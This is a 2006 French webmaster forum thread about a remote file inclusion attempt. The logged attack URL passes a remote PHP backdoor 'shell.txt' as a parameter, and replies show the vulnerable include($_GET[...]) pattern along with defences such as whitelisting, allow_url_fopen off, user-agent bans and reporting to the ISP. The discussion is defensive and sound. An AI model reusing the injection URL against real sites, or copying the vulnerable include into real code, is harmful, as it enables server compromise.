Tentative de Hack ?

le Mar Oct 17, 2006 1:01

J'utilise un script de stats dont j'ai protégé le repertoire avec un htaccess. J'ai fait de sorte qu'une tentative infructueuse m'envoit un mail avec la page référente, la page ayant générée l'erreur, l'Ip du visiteur, l'IP de son FAi, sa résollution, etc.
Hier, pour la première fois je reçois un mail d'une tentative d'accès et voici l'url d'accès: -http://www.soninkara.org/ .../xxx.php?url_hit=http://gupl.org/mail/shell.txt?
Alors intrigué et inquiet je me suis rendu à cet adresse +http://gupl.org/mail/shell.txt et quelle n'a été ma surprise de voir une page PHP et mon antivirus qui me dit avoir bloqué le virus PHP.Backdoor.TROJAN.

Je suis convaincu que c'est une tentative de piratage. Je possède l'url du visiteur et c'est un abonné de Free. La même IP est apparue aujourdhui encore en voulant faire la même chose.
Une question: je voudrais dénoncer cette tentative, devrai-je la faire chez Free ou à la Police ?
Si des personnes peuvent m'indiquer sur la façon de procéder, ce sera sympa.

le Mar Oct 17, 2006 1:25

Il s'agit bien d'un pirate qui essaie de profiter d'une éventuelle faiblesse de ton site.

Il essaie d'executer le code php contenu dans son shell.txt à partir de ton site. Imagine que dans ta page php tu aies mis un code du genre:

<?php
include($_GET['url_hit']);
?>

Tu serais cuit car son code va être inclut et executé dans ton script.

Le remède: Ne JAMAIS utiliser une variable dans un include sans imposer des règles bien précises (exemple: lister toutes les possibilités que la variable peut prendre et tester à chaque fois si le contenu de la variable est valide). On peut aussi desactiver l'inclusion d'url distantes afin d'empêcher ce genre d'intrusions.

le Mar Oct 17, 2006 9:01

Tu n’utilises pas par hasard AWSTAT, j’ai eu le même phénomène

le Mar Oct 17, 2006 9:46

Ils essayent sur tous les scripts connus.
J'a banni le useragent libwww via htaccess.

François

le Mar Oct 17, 2006 12:08

Sak a écrit:Une question: je voudrais dénoncer cette tentative, devrai-je la faire chez Free ou à la Police ?
Si des personnes peuvent m'indiquer sur la façon de procéder, ce sera sympa.

Pour ma part j'envoie une copie du mail à l'hébergeur sans m'attarder sur les détails et j'écris qq chose comme:
"mon moniteur de sécurité m'a averti d'une tentative d'intrusion sur mon site xy. le rapport indique que cette tentative provient de l'un de vos usagers (copie ci-joint, ip, email etc...). pourriez-vous faire le nécessaire auprès de votre client pour qu'il cesse ses agissements irréguliers ? ... je vous prie de m'avertir si vous ne parvenez pas à l'identifier afin que je puisse transmettre mes éléments aux services de police concernés."

le Mar Oct 17, 2006 21:33

ebe327 a écrit:Tu n’utilises pas par hasard AWSTAT, j’ai eu le même phénomène

Il s'agit du script Kietu?. Je viens de faire part au responsable du script la tentative de hack.
Je vais envoyer un mail à son FAI c'est à dire FREE et je vous tiendrais au courant.
Je remercie toute la communauté WRI.

le Mar Oct 17, 2006 22:10

bigjet a écrit:lister toutes les possibilités que la variable peut prendre et tester à chaque fois si le contenu de la variable est valide

Pas toujours possible ...

bigjet a écrit:On peut aussi desactiver l'inclusion d'url distantes afin d'empêcher ce genre d'intrusions.

Comment tu mets ça en pratique ???

le Mer Oct 18, 2006 16:49

bigjet a écrit:On peut aussi desactiver l'inclusion d'url distantes afin d'empêcher ce genre d'intrusions.

Comment tu mets ça en pratique ???[/quote]
Je suis aussi preneur de cette solution.
Est ce via htaccess ?

le Mer Oct 18, 2006 17:06

Après recherche, il paraît que les pirates cherchent des serveurs mal configurés ayant Register_Globals est à ON. Il ne s'agit pas d'une faille de sécurité de Kietu? mais plutôt d'une faille créée par la configuration serveur
Dans mon exemple, cela définira bien une variable $_GET['url_hit'] qui contiendra +http://gupl.org/mail/shell.txt

le Ven Oct 20, 2006 18:35

Sak a écrit:
bigjet a écrit:On peut aussi desactiver l'inclusion d'url distantes afin d'empêcher ce genre d'intrusions.

Comment tu mets ça en pratique ???
Je suis aussi preneur de cette solution.
Est ce via htaccess ?

Désolé de la réponse tardive.
Normalement ça se fait via le php.ini et c'est la variable allow_url_fopen qu'il faut mettre à off.

le Sam Oct 21, 2006 1:03

Ok merci pour l'info

le Sam Oct 21, 2006 9:40

bigjet a écrit:Normalement ça se fait via le php.ini et c'est la variable allow_url_fopen qu'il faut mettre à off.

C'est pour les dédiés ça ? En mutualisé, on ne peut pas modifier le fichier php.ini ... C'est peut-être déjà à cet valeur. Il y a moyen de le savoir ou pas ???

Merci quand même de ta réponse, ça peut toujours servir :wink:

le Sam Oct 21, 2006 10:38

oui tu peux le savoir via le phpinfo.
(une recherche sur la page phpinfo avec le nav.)

par contre ce qui m'intéresse c'est de savoir s'il est possible de désactiver la fonction via htaccess.
(ou même dans le code htaccess)

le Sam Oct 21, 2006 11:00

thierry8 a écrit:une recherche sur la page phpinfo avec le nav.

C'est-à-dire ??? Quelle page phpinfo ???

le Sam Oct 21, 2006 13:00

faut mettre

echo phpinfo();

dans une page

rog

Tentative de Hack ?

Tentative de Hack ?

Re: Tentative de Hack ?

Formation recommandée sur ce thème :

Lectures recommandées sur ce thème :

Qui est en ligne